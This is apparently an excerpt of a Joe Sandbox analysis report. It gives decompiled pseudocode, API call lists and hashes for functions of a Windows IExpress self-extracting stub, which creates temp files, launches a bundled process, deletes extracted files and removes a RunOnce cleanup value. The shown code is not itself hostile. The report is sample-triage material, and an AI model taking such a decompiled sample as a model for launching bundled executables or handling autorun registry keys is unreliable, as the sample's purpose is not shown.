                                                                      • Opcode Fuzzy Hash: c1a994f87e7c1a1427cc4e48b9cf580d1dec9f56957ef8da1574bbf1186292f1
                                                                      • Instruction Fuzzy Hash: 6141C0319447288BEB21BB649C497FA77A4FB84775F64012AE841E7290CF788842BB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 587 f858c8-f858d5 588 f858d8-f858dd 587->588 588->588 589 f858df-f858f1 LocalAlloc 588->589 590 f85919-f85959 call f81680 call f8658a CreateFileA LocalFree 589->590 591 f858f3-f85901 call f844b9 589->591 594 f85906-f85910 call f86285 590->594 600 f8595b-f8596c CloseHandle GetFileAttributesA 590->600 591->594 601 f85912-f85918 594->601 600->594 602 f8596e-f85970 600->602 602->594 603 f85972-f8597b 602->603 603->601
                                                                      C-Code - Quality: 95%
                                                                      			E00F858C8(intOrPtr* __ecx) {
                                                                      				void* _v8;
                                                                      				intOrPtr _t6;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				void* _t14;
                                                                      				signed char _t16;
                                                                      				void* _t20;
                                                                      				void* _t23;
                                                                      				intOrPtr* _t27;
                                                                      				CHAR* _t33;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t33 = __ecx;
                                                                      				_t27 = __ecx;
                                                                      				_t23 = __ecx + 1;
                                                                      				do {
                                                                      					_t6 =  *_t27;
                                                                      					_t27 = _t27 + 1;
                                                                      				} while (_t6 != 0);
                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                      				if(_t20 != 0) {
                                                                      					E00F81680(_t20, _t36, _t33);
                                                                      					E00F8658A(_t20, _t36, "TMP4351$.TMP");
                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                      					_v8 = _t10;
                                                                      					LocalFree(_t20);
                                                                      					_t12 = _v8;
                                                                      					if(_t12 == 0xffffffff) {
                                                                      						goto L4;
                                                                      					} else {
                                                                      						CloseHandle(_t12);
                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							 *0xf89124 = 0;
                                                                      							_t14 = 1;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      					L4:
                                                                      					 *0xf89124 = E00F86285();
                                                                      					_t14 = 0;
                                                                      				}
                                                                      				return _t14;
                                                                      			}














                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F858E7
                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85943
                                                                      • LocalFree.KERNEL32(00000000,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8594D
                                                                      • CloseHandle.KERNEL32(00000000,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8595C
                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85963
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                      • API String ID: 747627703-2825630923
                                                                      • Opcode ID: 890e09afecfe78b68075f32006557d0b0a2e9def032f2f2e1a2faf55e33f3324
                                                                      • Instruction ID: 51b37ddd8d63077803ca8cf1a18652c6ccbfc02d8de643a8a774e3ff36a2d210
                                                                      • Opcode Fuzzy Hash: 890e09afecfe78b68075f32006557d0b0a2e9def032f2f2e1a2faf55e33f3324
                                                                      • Instruction Fuzzy Hash: 1E113831B0061467DB207FB95C4DBEB7E9DEF45770B100616F505D31D1DA74D806A7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 631 f83fef-f84010 632 f8410a-f8411a call f86ce0 631->632 633 f84016-f8403b CreateProcessA 631->633 635 f84041-f8406e WaitForSingleObject GetExitCodeProcess 633->635 636 f840c4-f84101 call f86285 GetLastError FormatMessageA call f844b9 633->636 637 f84070-f84077 635->637 638 f84091 call f8411b 635->638 650 f84106 636->650 637->638 641 f84079-f8407b 637->641 645 f84096-f840b8 CloseHandle * 2 638->645 641->638 644 f8407d-f84089 641->644 644->638 647 f8408b 644->647 648 f84108 645->648 649 f840ba-f840c0 645->649 647->638 648->632 649->648 651 f840c2 649->651 650->648 651->650
                                                                      C-Code - Quality: 84%
                                                                      			E00F83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v524;
                                                                      				long _v528;
                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t20;
                                                                      				void* _t22;
                                                                      				int _t25;
                                                                      				intOrPtr* _t39;
                                                                      				signed int _t44;
                                                                      				void* _t49;
                                                                      				signed int _t50;
                                                                      				intOrPtr _t53;
                                                                      
                                                                      				_t45 = __edx;
                                                                      				_t20 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t20 ^ _t50;
                                                                      				_t39 = __ecx;
                                                                      				_t49 = 1;
                                                                      				_t22 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					L13:
                                                                      					return E00F86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                      				}
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                      				if(_t25 == 0) {
                                                                      					 *0xf89124 = E00F86285();
                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                      					_t45 = 0x4c4;
                                                                      					E00F844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                      					L11:
                                                                      					_t49 = 0;
                                                                      					L12:
                                                                      					_t22 = _t49;
                                                                      					goto L13;
                                                                      				}
                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                      				_t44 = _v528;
                                                                      				_t53 =  *0xf88a28; // 0x0
                                                                      				if(_t53 == 0) {
                                                                      					_t34 =  *0xf89a2c; // 0x0
                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                      						_t34 = _t44 & 0xff000000;
                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                      							 *0xf89a2c = _t44;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				E00F8411B(_t34, _t44);
                                                                      				CloseHandle(_v544.hThread);
                                                                      				CloseHandle(_v544);
                                                                      				if(( *0xf89a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                      					goto L12;
                                                                      				} else {
                                                                      					goto L11;
                                                                      				}
                                                                      			}



















                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00F84033
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F84049
                                                                      • GetExitCodeProcess.KERNELBASE ref: 00F8405C
                                                                      • CloseHandle.KERNEL32(?), ref: 00F8409C
                                                                      • CloseHandle.KERNEL32(?), ref: 00F840A8
                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F840DC
                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F840E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 3183975587-0
                                                                      • Opcode ID: cdcebd515a4a9028288cdbcd648a4c7148802f9973102e15d75e420f1072a7e1
                                                                      • Instruction ID: 199093de1051b3df53d0adc137158c5def39e71106483e3b0d0d6270f1add08a
                                                                      • Opcode Fuzzy Hash: cdcebd515a4a9028288cdbcd648a4c7148802f9973102e15d75e420f1072a7e1
                                                                      • Instruction Fuzzy Hash: A831AE31A4061CABEB21AB65DC4DFFB777CEB94711F1001AAFA05E21A1CA345D85EF21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 652 f851e5-f8520b call f8468f LocalAlloc 655 f8522d-f8523c call f8468f 652->655 656 f8520d-f85228 call f844b9 call f86285 652->656 662 f8523e-f85260 call f844b9 LocalFree 655->662 663 f85262-f85270 lstrcmpA 655->663 668 f852b0 656->668 662->668 666 f8527e-f8529c call f844b9 LocalFree 663->666 667 f85272-f85273 LocalFree 663->667 674 f8529e-f852a4 666->674 675 f852a6 666->675 670 f85279-f8527c 667->670 673 f852b2-f852b5 668->673 670->673 674->670 675->668
                                                                      C-Code - Quality: 100%
                                                                      			E00F851E5(void* __eflags) {
                                                                      				int _t5;
                                                                      				void* _t6;
                                                                      				void* _t28;
                                                                      
                                                                      				_t1 = E00F8468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                      				if(_t28 != 0) {
                                                                      					if(E00F8468F("UPROMPT", _t28, _t29) != 0) {
                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                      						if(_t5 != 0) {
                                                                      							_t6 = E00F844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                      							LocalFree(_t28);
                                                                      							if(_t6 != 6) {
                                                                      								 *0xf89124 = 0x800704c7;
                                                                      								L10:
                                                                      								return 0;
                                                                      							}
                                                                      							 *0xf89124 = 0;
                                                                      							L6:
                                                                      							return 1;
                                                                      						}
                                                                      						LocalFree(_t28);
                                                                      						goto L6;
                                                                      					}
                                                                      					E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      					LocalFree(_t28);
                                                                      					 *0xf89124 = 0x80070714;
                                                                      					goto L10;
                                                                      				}
                                                                      				E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      				 *0xf89124 = E00F86285();
                                                                      				goto L10;
                                                                      			}







                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F4D,?,00000002,00000000), ref: 00F85201
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F85250
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$UPROMPT
                                                                      • API String ID: 957408736-2980973527
                                                                      • Opcode ID: 92c475a7174f68f1b73238ce3965e552744e114811dd947469d68241c9a0b298
                                                                      • Instruction ID: 80fe45499ac5be4e62e27504f42fdaa6b792f037b3edd6d83b8da152c9a7424e
                                                                      • Opcode Fuzzy Hash: 92c475a7174f68f1b73238ce3965e552744e114811dd947469d68241c9a0b298
                                                                      • Instruction Fuzzy Hash: 9B110872704605ABE714BBB15C8AFFB719DEB89B50B104429FA02D5190EEBC9C017325
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00F852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				signed int _t9;
                                                                      				signed int _t11;
                                                                      				void* _t21;
                                                                      				void* _t29;
                                                                      				CHAR** _t31;
                                                                      				void* _t32;
                                                                      				signed int _t33;
                                                                      
                                                                      				_t28 = __edi;
                                                                      				_t22 = __ecx;
                                                                      				_t21 = __ebx;
                                                                      				_t9 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t9 ^ _t33;
                                                                      				_push(__esi);
                                                                      				_t31 =  *0xf891e0; // 0x798408
                                                                      				if(_t31 != 0) {
                                                                      					_push(__edi);
                                                                      					do {
                                                                      						_t29 = _t31;
                                                                      						if( *0xf88a24 == 0 &&  *0xf89a30 == 0) {
                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                      							DeleteFileA( *_t31); // executed
                                                                      						}
                                                                      						_t31 = _t31[1];
                                                                      						LocalFree( *_t29);
                                                                      						LocalFree(_t29);
                                                                      					} while (_t31 != 0);
                                                                      					_pop(_t28);
                                                                      				}
                                                                      				_t11 =  *0xf88a20; // 0x0
                                                                      				_pop(_t32);
                                                                      				if(_t11 != 0 &&  *0xf88a24 == 0 &&  *0xf89a30 == 0) {
                                                                      					_push(_t22);
                                                                      					E00F81781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      					if(( *0xf89a34 & 0x00000020) != 0) {
                                                                      						E00F865E8( &_v268);
                                                                      					}
                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                      					_t22 =  &_v268;
                                                                      					E00F82390( &_v268);
                                                                      					_t11 =  *0xf88a20; // 0x0
                                                                      				}
                                                                      				if( *0xf89a40 != 1 && _t11 != 0) {
                                                                      					_t11 = E00F81FE1(_t22); // executed
                                                                      				}
                                                                      				 *0xf88a20 =  *0xf88a20 & 0x00000000;
                                                                      				return E00F86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                      			}













                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00798408,00000080,?,00000000), ref: 00F852F2
                                                                      • DeleteFileA.KERNELBASE(00798408), ref: 00F852FA
                                                                      • LocalFree.KERNEL32(00798408,?,00000000), ref: 00F85305
                                                                      • LocalFree.KERNEL32(00798408), ref: 00F8530C
                                                                      • SetCurrentDirectoryA.KERNELBASE(00F811FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F85363
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F85334
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                      • API String ID: 2833751637-1116576409
                                                                      • Opcode ID: ed04843a71145ed09d10b8c624170e7a0aa507e00999466ea6cdb6ac464d375d
                                                                      • Instruction ID: 5cf1658226ae399e93f2bd067b06c2e7b0e05c178f42a7f61b76b7869c505087
                                                                      • Opcode Fuzzy Hash: ed04843a71145ed09d10b8c624170e7a0aa507e00999466ea6cdb6ac464d375d
                                                                      • Instruction Fuzzy Hash: DC21A13191460CDBDB24BB20DD49BF977A5FB00BA0F48015AE442561A0CFF99C85FB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F81FE1(void* __ecx) {
                                                                      				void* _v8;
                                                                      				long _t4;
                                                                      
                                                                      				if( *0xf88530 != 0) {
                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                      					if(_t4 == 0) {
                                                                      						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                      						return RegCloseKey(_v8);
                                                                      					}
                                                                      				}
                                                                      				return _t4;
                                                                      			}






                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00F8538C,?,?,00F8538C), ref: 00F82005
                                                                      • RegDeleteValueA.KERNELBASE(00F8538C,wextract_cleanup1,?,?,00F8538C), ref: 00F82017
                                                                      • RegCloseKey.ADVAPI32(00F8538C,?,?,00F8538C), ref: 00F82020
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                      • API String ID: 849931509-1592051331
                                                                      • Opcode ID: 0984bc286fffa5744f7921f407c6bfc5cd6719f4b6e973a4e2dada2489fb5746
                                                                      • Instruction ID: f247c37aea4066049c6a219f724ffa978d5a80acc01609ef5bb0f439f9151939
                                                                      • Opcode Fuzzy Hash: 0984bc286fffa5744f7921f407c6bfc5cd6719f4b6e973a4e2dada2489fb5746
                                                                      • Instruction Fuzzy Hash: 83E04F3095031CBBEB22ABD0EC0AFE97B69E701791F640195B904A4060EB61AA14F706
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F84CD0(char* __edx, long _a4, int _a8) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t29;
                                                                      				int _t30;
                                                                      				long _t32;
                                                                      				signed int _t33;
                                                                      				long _t35;
                                                                      				long _t36;
                                                                      				struct HWND__* _t37;
                                                                      				long _t38;
                                                                      				long _t39;
                                                                      				long _t41;
                                                                      				long _t44;
                                                                      				long _t45;
                                                                      				long _t46;
                                                                      				signed int _t50;
                                                                      				long _t51;
                                                                      				char* _t58;
                                                                      				long _t59;
                                                                      				char* _t63;
                                                                      				long _t64;
                                                                      				CHAR* _t71;
                                                                      				CHAR* _t74;
                                                                      				int _t75;
                                                                      				signed int _t76;
                                                                      
                                                                      				_t69 = __edx;
                                                                      				_t29 =  *0xf88004; // 0x644c7055
                                                                      				_t30 = _t29 ^ _t76;
                                                                      				_v8 = _t30;
                                                                      				_t75 = _a8;
                                                                      				if( *0xf891d8 == 0) {
                                                                      					_t32 = _a4;
                                                                      					__eflags = _t32;
                                                                      					if(_t32 == 0) {
                                                                      						_t33 = E00F84E99(_t75);
                                                                      						L35:
                                                                      						return E00F86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                      					}
                                                                      					_t35 = _t32 - 1;
                                                                      					__eflags = _t35;
                                                                      					if(_t35 == 0) {
                                                                      						L9:
                                                                      						_t33 = 0;
                                                                      						goto L35;
                                                                      					}
                                                                      					_t36 = _t35 - 1;
                                                                      					__eflags = _t36;
                                                                      					if(_t36 == 0) {
                                                                      						_t37 =  *0xf88584; // 0x0
                                                                      						__eflags = _t37;
                                                                      						if(_t37 != 0) {
                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                      						}
                                                                      						_t54 = 0xf891e4;
                                                                      						_t58 = 0xf891e4;
                                                                      						do {
                                                                      							_t38 =  *_t58;
                                                                      							_t58 =  &(_t58[1]);
                                                                      							__eflags = _t38;
                                                                      						} while (_t38 != 0);
                                                                      						_t59 = _t58 - 0xf891e5;
                                                                      						__eflags = _t59;
                                                                      						_t71 =  *(_t75 + 4);
                                                                      						_t73 =  &(_t71[1]);
                                                                      						do {
                                                                      							_t39 =  *_t71;
                                                                      							_t71 =  &(_t71[1]);
                                                                      							__eflags = _t39;
                                                                      						} while (_t39 != 0);
                                                                      						_t69 = _t71 - _t73;
                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                      						__eflags = _t30 - 0x104;
                                                                      						if(_t30 >= 0x104) {
                                                                      							L3:
                                                                      							_t33 = _t30 | 0xffffffff;
                                                                      							goto L35;
                                                                      						}
                                                                      						_t69 = 0xf891e4;
                                                                      						_t30 = E00F84702( &_v268, 0xf891e4,  *(_t75 + 4));
                                                                      						__eflags = _t30;
                                                                      						if(__eflags == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t41 = E00F8476D( &_v268, __eflags);
                                                                      						__eflags = _t41;
                                                                      						if(_t41 == 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						_push(0x180);
                                                                      						_t30 = E00F84980( &_v268, 0x8302); // executed
                                                                      						_t75 = _t30;
                                                                      						__eflags = _t75 - 0xffffffff;
                                                                      						if(_t75 == 0xffffffff) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t30 = E00F847E0( &_v268);
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						 *0xf893f4 =  *0xf893f4 + 1;
                                                                      						_t33 = _t75;
                                                                      						goto L35;
                                                                      					}
                                                                      					_t44 = _t36 - 1;
                                                                      					__eflags = _t44;
                                                                      					if(_t44 == 0) {
                                                                      						_t54 = 0xf891e4;
                                                                      						_t63 = 0xf891e4;
                                                                      						do {
                                                                      							_t45 =  *_t63;
                                                                      							_t63 =  &(_t63[1]);
                                                                      							__eflags = _t45;
                                                                      						} while (_t45 != 0);
                                                                      						_t74 =  *(_t75 + 4);
                                                                      						_t64 = _t63 - 0xf891e5;
                                                                      						__eflags = _t64;
                                                                      						_t69 =  &(_t74[1]);
                                                                      						do {
                                                                      							_t46 =  *_t74;
                                                                      							_t74 =  &(_t74[1]);
                                                                      							__eflags = _t46;
                                                                      						} while (_t46 != 0);
                                                                      						_t73 = _t74 - _t69;
                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                      						__eflags = _t30 - 0x104;
                                                                      						if(_t30 >= 0x104) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t69 = 0xf891e4;
                                                                      						_t30 = E00F84702( &_v268, 0xf891e4,  *(_t75 + 4));
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                      						_t30 = E00F84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						E00F84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                      						__eflags = _t50;
                                                                      						if(_t50 != 0) {
                                                                      							_t51 = _t50 & 0x00000027;
                                                                      							__eflags = _t51;
                                                                      						} else {
                                                                      							_t51 = 0x80;
                                                                      						}
                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						} else {
                                                                      							_t33 = 1;
                                                                      							goto L35;
                                                                      						}
                                                                      					}
                                                                      					_t30 = _t44 - 1;
                                                                      					__eflags = _t30;
                                                                      					if(_t30 == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					goto L9;
                                                                      				}
                                                                      				if(_a4 == 3) {
                                                                      					_t30 = E00F84B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                      				}
                                                                      				goto L3;
                                                                      			}
































                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00F84DB5
                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00F84DDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFileItemText
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                      • API String ID: 3625706803-1116576409
                                                                      • Opcode ID: 814f8040a26017a064595373696bfcd2468628d73580d56071caa2167e531673
                                                                      • Instruction ID: 766fdcfe5aba5d4932fec2f4807479affe6b93ece791b8edbcd2169f37f7fd84
